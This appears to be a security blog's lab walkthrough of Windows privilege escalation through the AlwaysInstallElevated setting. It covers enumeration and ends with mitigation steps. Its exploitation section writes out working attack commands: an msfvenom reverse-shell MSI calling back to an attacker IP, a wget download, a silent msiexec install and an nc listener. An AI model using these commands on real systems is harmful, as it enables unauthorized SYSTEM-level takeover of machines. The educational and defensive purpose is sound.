Leveraging “AlwaysInstallElevated” for Windows Privilege Escalation

| Posted on |

The “AlwaysInstallElevated setting in Windows is a misconfiguration that allows low-privileged users to escalate privileges to SYSTEM by installing MSI packages. This setting is often mistakenly enabled by administrators – making it a common privilege escalation vector for attackers.

What is AlwaysInstallElevated?

AlwaysInstallElevated is a Windows policy setting that allows standard users to run Windows Installer (.msi) packages with elevated privileges. This setting is intended for enterprise environments where administrators want to allow software installations without requiring administrative credentials.

However, if both the HKLM (Local Machine) and HKCU (Current User) registry keys are set to 1, any user can execute MSI files with SYSTEM privileges, leading to potential privilege escalation vulnerabilities. Attackers can exploit this misconfiguration by crafting malicious MSI packages to gain elevated access.

A common scenario where this misconfiguration is inadvertently left enabled is when system administrators set up automated software installations in a corporate environment with the “AlwaysInstallElevated” setting. However, after deployment, they may forget to revert the setting, which leaves the system vulnerable.

Lab Setup

To demonstrate the Proof of Concept (PoC), we misconfigured our lab to have the “AlwaysInstallElevated” setting enabled:

  1. Target Machine: Windows 10 Enterprise (10.0.2.40)
  2. Attacker Machine: Kali Linux (10.0.2.29)

Configuration

On the Windows machine, follow these steps to enable the AlwaysInstallElevated setting using the Group Policy Editor:

  1. Press Win + R, type gpedit.msc, and press Enter to open the Local Group Policy Editor.
  • Navigate to Computer ConfigurationAdministrative TemplatesWindows Components Windows Installer
  • Locate the policy named Always install with elevated privileges. Double-click the policy, select Enabled, and click OK.
  • Repeat step 3 under User ConfigurationAdministrative TemplatesWindows Components Windows Installer
  • Once both policies are enabled, apply the changes by running the following command in an elevated command prompt:

gpupdate /force

Privilege Escalation – Enumeration

This PoC assumes an initial foothold has been gained on the target, as a low-level user. Therefore, we will demonstrate how to exploit this misconfiguration to escalate our privilege to “SYSTEM”.

First, we need to check if the “AlwaysInstallElevated” setting in enabled on the target. To do that, run the following commands in cmd or powershell:

reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

reg query HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

If both keys return 0x1, then the system is vulnerable.

Privilege Escalation – WinPEAS

We can also use an automated enumeration script such as WinPEAS. WinPeas is a powerful privilege escalation auditing tool that identifies weaknesses in Windows systems, that could lead to possible path to escalate privileges.

The script will automatically enumerate the misconfiguration once executed on the target.

After downloading the script on our attacker machine, we can transfer it to the target machine. But before executing the script on the target, run the following command to get the output in colors:

REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1

Execute the script:

The result shows the “AlwaysInstallElevated” setting set to 1 in HKLM and HKCU. Which means the system is vulnerable.

Privilege Escalation – Manual Exploitation

To exploit this vulnerability (setting), we need to generate a malicious package installer file (.msi) on our attacker machine, using msfvenom. Then upload it to the target machine by hosting up a local server on our attacker machine.

The malicious package installer file (.msi) will launch a reverse shell back to our attacker machine, as the “SYSTEM” user.

To generate the .msi file with msfvenom, run the following command:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<attacker_ip> lport=443 -a x64 –platform windows -f msi -o shell.msi

To host up a local server on our attacker machine, run:

python3 -m http.server 80

To download and install the malicious package installer file (.msi) on the target machine, run the following commands:

wget http://<attacker_ip>/shell.msi -o shell.msi

msiexec /quiet /qn /i shell.msi

Ensure a listener with the same port (443) used in generating the malicious msi file is hosted up on your attacker machine before executing the msiexec command:

nc -nvlp 443

We can see that we are dropped into a reverse shell as “NT Authority\System” once the malicious msi file is executed. Which means we have fully compromised the target machine.

Mitigation

To mitigate this misconfiguration, disable the “AlwaysInstallElevated” setting:

  1. Open Local Group Policy Editor (gpedit.msc) and disable the Always install with elevated privileges setting under both Computer Configuration and User Configuration.
  2. Alternatively, open an elevated PowerShell session and run:

reg delete HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /f

reg delete HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated /f

  • Ensure that users do not have unnecessary administrative privileges.
  • Regularly audit system configurations for security misconfigurations.

Conclusion

The “AlwaysInstallElevated” misconfiguration is a simple yet effective privilege escalation technique. By exploiting improperly configured systems, attackers can gain SYSTEM privileges with ease, once an initial foothold is gained.

If the “AlwaysInstallElevated” setting must be used in a corporate environment, system administrators should ensure that the setting is disabled after deploying the necessary software.

By Emmanuel Akobe-Ajibolu

Leave a Reply

Your email address will not be published. Required fields are marked *

Scroll to Top